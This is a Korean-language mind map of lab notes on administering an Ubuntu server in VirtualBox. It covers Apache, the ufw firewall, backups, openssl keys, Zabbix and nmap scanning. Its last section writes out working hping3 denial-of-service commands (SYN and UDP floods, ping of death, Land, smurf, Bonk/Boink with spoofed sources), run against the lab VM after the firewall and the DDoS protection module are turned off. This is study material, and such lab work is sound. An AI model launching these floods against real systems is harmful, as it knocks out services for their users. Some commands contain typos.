Get Started. It's Free
or sign up with your email address
Rocket clouds
UBUNTU by Mind Map: UBUNTU

1. 1. Virtual Box 로 Ubuntu 설치 후 PUTTY로 접근

1.1. 해상도 변경

1.1.1. vi /etc/default/grub

1.2. 관리자 계정 설정

1.2.1. passwd root

1.3. 사용자계정 보안 설정

1.3.1. /etc/login.defs

1.4. 사용자 계정 추가 및 삭제

1.4.1. useradd, usermod, userdel

1.5. HISTORY 내역 관리

1.5.1. .bash_history파일 삭제 후 reboot

1.6. 특정 그룹 su 명령어 관리

1.6.1. vi /etc/pam.d/su 파일 확인

1.7. 사용자 디렉토리 디스크 용량 제한

1.7.1. vm에 새 하드디스크 추가, fdisk이용 생성 후 uuid 설정

1.7.2. backup 디렉토리 생성 후 부팅마다 마운트 적용vi /etc/fstab 이용 uuid 파일 열기

1.7.3. quota 패키지 인스톨 후 quota 마운트 경로에 옵션 추가

2. 2. APACHE 설치

2.1. 아파치 2 설치

2.1.1. apt-get install apache2

2.2. Virtual box 포트 포워딩 설정 추가

2.2.1. 포트포워딩 80포트 생성

2.3. 크롬으로 localhost 확인

2.3.1. 크롬에 Localhost 또는 192.168.56.1로 접속

2.4. 패킷 방화벽 설정

2.4.1. ufw status verbose, ufw reset

2.4.2. 추가 : ufw allow xxx 삭제 : ufw delete allow xxx 접근 거부 : ufw deny xxx

2.5. 방화벽 켜기, 끄기

2.5.1. 켜기 : ufw enable 끄기 : ufw disable

2.6. SSH 파일 설정 확인

2.6.1. vi /etc/ssh/sshd_config

2.7. 루트 디렉토리 사용 폴더 생성

2.7.1. /var/www/test_apache_root 디렉터리 생성

2.8. Localhost 메인 화면 수정

2.8.1. vi /etc/var/www/test_apache_root/index.html

2.9. DDOS 방어 모듈 설치

2.9.1. apt-get install libapache2-mod-evasive 설치 후 localhost에서 ddos공격

3. 3. 백업과 복구

3.1. 버츄얼 박스에 새 하드디스크 추가

3.1.1. 새 하드디스크 추가 후 fdisk 작업

3.1.2. mount -a 를 이용하여 마운트

3.2. backup 디렉터리 생성

3.2.1. mkdir /backup vi backup.sh

3.3. 백업 예약 스케쥴러

3.3.1. cron, crontab

4. 4. SSH용 SSL 설정

4.1. 웹 서버 root 폴더 변경

4.1.1. mkdir /var/www/root_test

4.2. 아파치 SSL 모듈 활성화 및 재시작

4.2.1. a2enmod ssl service apache2 restart

4.3. 아파치 SSL키 저장용 폴더 생성

4.3.1. mkdir /etc/apache2/ssl

4.4. x.509표준 rsa 2048비트 키 생성

4.4.1. openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/xxxx.key -out /etc/apache2/ssl/xxxx.crt

4.5. 키 파일과 내용 확인

4.5.1. openssl rsa -noout -text -in xxx.key

4.6. 아파치 SSL 설정 수정

4.6.1. vi /etc/apache2/sites-available/default-ssl.conf

4.7. 버츄얼 박스 포트 추가 및 방화벽 443포트 추가

4.7.1. 포트 포워딩 443 추가 ufw allow 443

4.8. 아파치 SSL 설정 적용 후 재시작

4.8.1. a2ensite default-ssl.conf service apache2 restart

4.9. SSL 암,복호화

4.9.1. openssl enc -aes-256-cbc -in /var/www/root_test/entext.txt -out 학번.dat openssl enc –aes-256-cbc –d –in 학번.dat > detext.txt

4.10. 공개키와 개인키를 이용한 암,복호화

4.10.1. openssl genrsa -out private_key.pem 2048 openssl rsa -in private_key.pem -out public_key.pem -outform PEM -pubout

5. 5. Zabbix 설치 및 nmap

5.1. 저장소 추가

5.1.1. wget http://repo.zabbix.com/zabbix/2.2/ubuntu/pool/main/z/ zabbix-release/zabbix-release_2.2-1+trusty_all.deb dpkg –i zabbix-release_2.2-1+trusty_all.deb

5.2. zabbix 설치 및 재시작

5.2.1. apt-get install zabbix-server-mysql zabbix-frontend-php service apache2 restart service zabbix-server restart

5.3. zabbix web 설치

5.3.1. localhost/zabbix 접속화면 - next - 요구사항 검사 -  db 계정 입력 - next - 성정확인 - next - 설치완료화면

5.4. zabbix agent 설치 , 수정, 재시작

5.4.1. 설치 : apt-get install zabbix-agent  수정 : vi /etc/zabbix/zabbix_agentd.conf 재시작 : /etc/init.d/zabbix-agent restart

5.5. 웹 ui 접속

5.5.1. onfiguration  - Hosts - 호스트 목록 확인

5.6. 기본 호스트

5.6.1. zabbix servers - status

5.7. 웹 메인 화면

5.7.1. monitoring - graph - 서버 상태 그래프 확인

5.8. nmap 설치

5.8.1. apt-add-repository ppapi-rho/security apt-get update apt-get install nmap

5.9. nmap 스캐닝 명령어

5.9.1. 호스트 확인 -sP 특정 포트 검색 -sP -PT80 열린포트 모두 검색 -sT 스탤스 검색 -sS upd 포트 검색 -sU 운영체제 확인 -sS -O 자세한 정보 확인 -v

5.10. 리포트 출력 위한 xml 파일 저장

5.10.1. 명령어 뒤 -oX 명령어

5.11. 파일 변환을 위한 xsltpeoc 설치

5.11.1. apt-get install xsltproc 변환 명령어 xsltproc xxx.xml -o xxx.html

5.12. 웹 서버에서 확인

5.12.1. cp xxx.html /var/www/경로 복사 후   Localhost/xxx.html

5.13. nmap 스크립트 업데이트

5.13.1. nmap --script-update

5.14. 취약점 결과 html로 저장

5.14.1. 명령어 뒤 -oX 옵션 사용

6. 6.Hping을 이용한 공격

6.1. Hping3 설치 및 버전 확인

6.1.1. apt-get install hping3 Hping3 -version

6.2. 방화벽 해제

6.2.1. ufw disable

6.3. 기존 ddos 방어 모듈 제거

6.3.1. apt-get -pirge remove 모듈명

6.4. Hping 스캔 옵션 사용

6.4.1. hping3 10.0.2.15 -scan 20, 21 -V

6.5. 로컬 상에서 각 공격과 핑 명령어 수행 ping 명령 수행중인 상태에서 패킷 캡쳐

6.5.1. Ping of death 공격 hping3 -icmp -a 1.1.1.1 10.0.2.15 -d 65000 정상 핑 ping 10.0.2.15 패킷 캡처 tcpdump -v tcpdump -nni eth0 icmp

6.5.2. SYN FLOODING 공격  hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.0.2.15  패킷 캡처 tcpdump -v tcpdum -nni eth0

6.5.3. UDP FLOODING 공격  hping3 10.0.2.15 -2 --flood-source -p 80 -d 100 패킷 캡처 tcpdump -v tcpdum -nni eth0

6.5.4. Bonk Boink 공격 hping3 10.0.2.15 -a 1.1.1.1 -O 12343 --id 3200 -M 34340 -p 80 -d 320 패킷 캡처 tcpdump -v tcpdum -nni eth0

6.5.5. Land 공격 hping3 1.1.1.1 -a 1.1.1.1 -icmp --flood 패킷 캡처 tcpdump -v tcpdum -nni eth0

6.5.6. smurf 공격 hping3 10.0.0.255 -a 10.0.2.15 --icmp --flood 패킷 캡처 tcpdump -v tcpdum -nni eth0